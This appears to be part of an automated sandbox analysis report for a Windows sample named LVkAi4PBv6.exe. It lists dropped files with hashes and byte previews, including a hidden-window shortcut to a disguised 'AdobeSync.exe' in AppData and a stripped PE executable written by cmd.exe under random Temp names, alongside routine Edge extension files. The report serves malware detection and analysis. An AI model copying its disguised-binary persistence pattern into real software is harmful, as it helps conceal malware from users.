                                                                                                                                                                                                                                                                                                Preview:[03C8:03F0][2025-01-07T07:18:11]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe..[03C8:03F0][2025-01-07T07:18:11]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\LVkAi4PBv6.exe -burn.filehandle.attached=528 -burn.filehandle.self=552'..[03C8:03F0][2025-01-07T07:18:11]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\LVkAi4PBv6.exe'..[03C8:03F0][2025-01-07T07:18:11]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[03C8:03F0][2025-01-07T07:18:12]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user~1\AppData\Local\Temp\Scabbard_20250107071812.log'..[03C8:03F0][2025-01-07T07:18:12]i000: Setting string variable 'WixBundleName' to value 'Scabbard'..[03C8:03F0][2025-01-07T07:18:12]i000: Setting string variable 'WixBundleManufacturer' to value 'Ravine'..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\bgwf

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 7 11:18:14 2025, mtime=Tue Jan 7 11:18:14 2025, atime=Fri Jan 3 12:50:46 2025, length=1219488, window=hide
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):973
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.994254868767846
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:83+ozB2h9Q+V4zHAeYRqmgqQAuOoUgHAeY/RMJdMJtm:8vV2hSDLAeqqYnuOEAedJCJt
                                                                                                                                                                                                                                                                                                MD5:48A673BDA47312C9CA54E82D49445D67
                                                                                                                                                                                                                                                                                                SHA1:63A53CC29D0E06C6209D6514E63C10E91308E350
                                                                                                                                                                                                                                                                                                SHA-256:7454B9C5D52EA83C40E83D86F58C5D69F39D989009FD11353CF33232457D40C6
                                                                                                                                                                                                                                                                                                SHA-512:2BD21CF2759A31FF23A70180343227BBBAC7D45C0DF9F68175F78DAE128976A4BC76F83573493BDE1FDBD9D374261E6F2FC9A45653AA759C05509B790730FA52
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:L..................F.... ...{..9.`.....9.`.....}.]............................:..DG..Yr?.D..U..k0.&...&......Qg.*_......3.`...D.@.`......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.='ZEb..........................3*N.A.p.p.D.a.t.a...B.V.1.....'ZHb..Roaming.@......EW.='ZHb..........................W.-.R.o.a.m.i.n.g.....f.1.....'ZHb..PATCHR~1..N......'ZHb'ZHb..........................I...P.a.t.c.h.R.e.a.d.e.r.W.C.F.....h.2.....#ZWn .ADOBES~1.EXE..L......'ZHb'ZHb..............................A.d.o.b.e.S.y.n.c...e.x.e.......n...............-.......m...........m..k.....C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe..B.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.P.a.t.c.h.R.e.a.d.e.r.W.C.F.\.A.d.o.b.e.S.y.n.c...e.x.e.`.......X.......172892...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\bkpxojga

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):2564608
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.715211244010203
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:JHp7RN0VYNfwgYt2uEHdFcX+oZFQ/IYAXHCo8Fq9VZO3tvZSLLtZ2mhVDKFKRwCL:LwQJc7XHb3742p
                                                                                                                                                                                                                                                                                                MD5:2B37DF2D59558C43AB3A09B85A42C9D5
                                                                                                                                                                                                                                                                                                SHA1:7595E1B746FDD08F8F39906EF39DE1B249046D67
                                                                                                                                                                                                                                                                                                SHA-256:E4D978C57CE320AF357A320024F8B75D0D677501DF1BE715623FAF4DDA061CDE
                                                                                                                                                                                                                                                                                                SHA-512:CAE560D8FA95224A6E5311E53AB030B4ED627115F324D2EC74DDFB2C195B9B9D47E00091195610BFB8441F365CC6AF7C93400F80F2E5BE14B0FBCA8A8120A3B3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....C.b.................(!...'.....W..........@..............................1.......'...`... ..............................................01......`1.8....P&..t...........p1..............................C&.(...................p11..............................text....'!......(!.................`..`.data........@!......,!.............@....rdata..p9...."..:....!.............@..@.pdata...t...P&..v...0&.............@..@.xdata..hW....&..X....&.............@..@.bss.........0'..........................idata.......01.......&.............@....CRT....0....@1.......'.............@....tls.........P1.......'.............@....rsrc...8....`1.......'.............@..@.reloc.......p1.......'.............@..Bubpux.... ....1.......'.............@...................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\c4f3ab79-ae5a-4dfd-8e3e-f7d5f76fb9cb.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\c74aa1b6-890c-465b-92ec-bce0739378fe.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1420
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.407180793263023
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L05Mc5Sgr0RWx5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5F
                                                                                                                                                                                                                                                                                                MD5:19EF4DD995CDD3D46BB1B29A97FE18F6
                                                                                                                                                                                                                                                                                                SHA1:B6F9AD0649E26B889A0D94FC4E8B80D5ED9953AB
                                                                                                                                                                                                                                                                                                SHA-256:D4CF58130CA2BCAE34D34AD0EE8DB71C8C4CD01D2ED83061EC20120888505354
                                                                                                                                                                                                                                                                                                SHA-512:8EFD2AE94BCB5ED0855290A6B94A3B9F2962E932C1744DA28D8F3ACA139CF6307EC13BC3E57DCCF98EE42CDB72AB2067DC6430C3298B70A5E1435055D8EDBDBE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\e701b2cc-cc87-4aed-abb0-06603e73c536.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\e86378e0-e519-4267-90f8-fa0e8ec47fa9.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):76326
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                                                                MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                                                                SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                                                                SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                                                                SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\eekxwchdkwfcah

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2564608
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.715211244010203
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:JHp7RN0VYNfwgYt2uEHdFcX+oZFQ/IYAXHCo8Fq9VZO3tvZSLLtZ2mhVDKFKRwCL:LwQJc7XHb3742p
                                                                                                                                                                                                                                                                                                MD5:2B37DF2D59558C43AB3A09B85A42C9D5
                                                                                                                                                                                                                                                                                                SHA1:7595E1B746FDD08F8F39906EF39DE1B249046D67
                                                                                                                                                                                                                                                                                                SHA-256:E4D978C57CE320AF357A320024F8B75D0D677501DF1BE715623FAF4DDA061CDE
                                                                                                                                                                                                                                                                                                SHA-512:CAE560D8FA95224A6E5311E53AB030B4ED627115F324D2EC74DDFB2C195B9B9D47E00091195610BFB8441F365CC6AF7C93400F80F2E5BE14B0FBCA8A8120A3B3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....C.b.................(!...'.....W..........@..............................1.......'...`... ..............................................01......`1.8....P&..t...........p1..............................C&.(...................p11..............................text....'!......(!.................`..`.data........@!......,!.............@....rdata..p9...."..:....!.............@..@.pdata...t...P&..v...0&.............@..@.xdata..hW....&..X....&.............@..@.bss.........0'..........................idata.......01.......&.............@....CRT....0....@1.......'.............@....tls.........P1.......'.............@....rsrc...8....`1.......'.............@..@.reloc.......p1.......'.............@..Bubpux.... ....1.......'.............@...................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_1353779736\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_1353779736\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_1353779736\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_1353779736\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_1353779736\e701b2cc-cc87-4aed-abb0-06603e73c536.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
